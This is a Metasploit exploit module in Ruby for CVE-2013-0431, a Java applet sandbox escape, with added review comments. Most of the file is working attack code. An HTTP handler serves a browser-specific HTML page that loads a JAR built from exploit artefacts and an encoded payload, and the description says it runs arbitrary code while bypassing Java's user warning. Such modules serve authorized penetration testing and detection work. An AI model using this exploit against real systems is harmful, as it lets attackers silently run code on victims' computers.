##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for CVE-2013-0431 (Java 7 JMX applet sandbox escape).
#
# Behaviour visible in this file: the HTTP server serves a small HTML loader
# page that references an applet JAR; the JAR is assembled at request time from
# pre-compiled artefacts shipped under data/exploits/cve-2013-0431 plus the
# payload's own encoded JAR. Everything else (request plumbing, payload
# generation, JAR packing) comes from the Msf mixins included below.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Registers module metadata (name, references, payload constraints, targets).
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet JMX Remote Code Execution',
        'Description' => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java code
          outside of the sandbox as exploited in the wild in February of 2013. Additionally,
          this module bypasses default security settings introduced in Java 7 Update 10 to run
          unsigned applet without displaying any warning to the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'Adam Gowdiak', # Vulnerability discovery
          'SecurityObscurity', # Exploit analysis and deobfuscation
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-0431' ],
          [ 'OSVDB', '89613' ],
          [ 'BID', '57726' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
          [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
          [ 'URL', 'http://pastebin.com/QWU1rqjf' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
        ],
        # Payload is embedded in the applet JAR, so no NOP sled and no bad chars apply.
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-01-19',
        # Reliability/stability/side-effect notes were never filled in for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request dispatcher for the module's resource.
  #
  # Routing is purely on the request path:
  #   * path ending in ".jar" (case-insensitive) -> the generated applet JAR,
  #     served as application/octet-stream;
  #   * path ending in "/"                       -> the HTML loader page;
  #   * anything else                            -> redirect to the resource
  #     root with a trailing slash, so the next request hits the HTML branch.
  #
  # Detection note: the observable sequence on the wire is redirect -> HTML
  # containing an <applet>/<embed> tag -> fetch of a randomly named *.jar; the
  # JAR name is never validated, only its ".jar" suffix.
  #
  # @param cli     [Object] client connection handle passed by the HTTP server mixin
  # @param request [Object] parsed request; only request.uri is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      print_status('Sending JAR')
      send_response(cli, generate_jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/$}
      print_status('Sending HTML')
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the applet JAR served to the browser.
  #
  # Starts from the payload's encoded JAR and adds three files read from
  # data/exploits/cve-2013-0431 (Exploit.ser, Exploit.class, B.class). Each
  # entry in `paths` is a path split into segments; the inner 1.upto loop adds
  # any missing parent-directory entries. Every path here has a single segment,
  # so 1.upto(0) yields nothing and that loop is effectively dead.
  #
  # NOTE(review): `cli` is neither a parameter nor a local of this method; it is
  # presumably exposed by the HttpServer mixin — confirm, otherwise this raises
  # NameError on first use.
  # NOTE(review): File.open is not in block form and has no ensure, so `fd` is
  # not closed if read raises.
  #
  # @return [String] the packed JAR bytes
  def generate_jar
    paths = [
      [ 'Exploit.ser' ],
      [ 'Exploit.class' ],
      [ 'B.class' ]
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar

    paths.each do |path|
      # Create parent directory entries ("a/", "a/b/") if they are not already present.
      1.upto(path.length - 1) do |idx|
        full = path[0, idx].join('/') + '/'
        if !(jar.entries.map { |e| e.name }.include?(full))
          jar.add_file(full, '')
        end
      end
      fd = File.open(File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-0431', path), 'rb')
      data = fd.read(fd.stat.size)
      jar.add_file(path.join('/'), data)
      fd.close
    end
    return jar.pack
  end

  # Returns the HTML loader page.
  #
  # The page branches on navigator.appName: Internet Explorer gets an <applet>
  # tag, every other browser an <embed> tag with a Java 1.6 applet MIME type.
  # Both reference "Exploit.ser" as the applet object. rand_text_alpha is
  # evaluated separately for each branch, so the two JAR names in the page
  # differ; that is harmless because on_request_uri matches any ".jar" path.
  #
  # @return [String] the HTML document
  def generate_html
    html = <<~EOF
      <html>
      <script language="Javascript">

      var _app = navigator.appName;

      if (_app == 'Microsoft Internet Explorer') {
        document.write('<applet archive="#{rand_text_alpha(rand(4..7))}.jar" object="Exploit.ser"></applet>');
      } else {
        document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(rand(4..7))}.jar"></embed>');
      }

      </script>
      </html>
    EOF
    return html
  end
end